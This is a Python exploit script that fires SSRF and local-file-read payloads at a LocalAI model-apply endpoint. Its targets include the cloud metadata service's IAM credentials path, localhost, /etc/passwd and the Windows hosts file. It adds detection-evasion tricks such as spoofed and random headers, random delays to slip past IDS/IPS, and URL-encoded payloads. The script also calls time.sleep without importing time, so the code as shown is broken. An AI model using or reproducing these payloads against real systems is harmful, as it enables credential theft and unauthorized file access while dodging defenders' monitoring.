import requests
import urllib.parse
import random
import string

# Target URL
target_url = "http://target.localai.instance/models/apply"

# Generate a random string for obfuscation purposes
def generate_random_string(length=6):
    return ''.join(random.choices(string.ascii_letters + string.digits, k=length))

# Advanced list of payloads for SSRF and LFI, including obfuscation and bypass techniques
payloads = [
    {"model": "http://169.254.169.254/latest/meta-data/iam/security-credentials/"},
    {"model": "http://127.0.0.1:80/"},
    {"model": "file:///etc/passwd"},
    {"model": "file:///C:/Windows/System32/drivers/etc/hosts"},
    # Obfuscated and encoded variations
    {"model": "file://" + generate_random_string() + "/../etc/passwd"},
    {"model": "file://" + generate_random_string() + "/../Windows/System32/drivers/etc/hosts"},
]

# Function to send the request with advanced headers and timeout handling
def send_payload(payload):
    try:
        # Set headers to mimic different browsers or clients
        headers = {
            "User-Agent": f"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0",
            "Content-Type": "application/json",
            "Referer": "http://example.com",
            "X-Custom-Header": generate_random_string(8)  # Custom header to evade detection
        }
        
        # Send POST request
        response = requests.post(target_url, json=payload, headers=headers, timeout=7)
        
        # Analyze the response
        if response.status_code == 200 and "error" not in response.text.lower():
            print(f"[+] Exploit Successful! Payload: {payload}")
            print(f"[+] Response (Trimmed):\n{response.text[:500]}")
        else:
            print(f"[-] Exploit Failed or No Significant Response. Payload: {payload}")
    except requests.exceptions.RequestException as e:
        print(f"[-] Request Failed: {e}")

# Function to encode payload to evade simple filtering and include random delays
def obfuscate_payload(payload):
    obfuscated_payload = {key: urllib.parse.quote_plus(value) for key, value in payload.items()}
    return obfuscated_payload

if __name__ == "__main__":
    print("[*] Starting Advanced Exploitation...")

    for payload in payloads:
        # Random delay to avoid detection by IDS/IPS systems
        delay = random.uniform(1, 3)
        print(f"[*] Delaying for {delay:.2f} seconds to avoid detection...")
        time.sleep(delay)
        
        # Obfuscate and send the payload
        obfuscated_payload = obfuscate_payload(payload)
        print(f"[*] Sending Obfuscated Payload: {obfuscated_payload}")
        send_payload(obfuscated_payload)
    
    print("[*] Advanced Exploitation Complete.")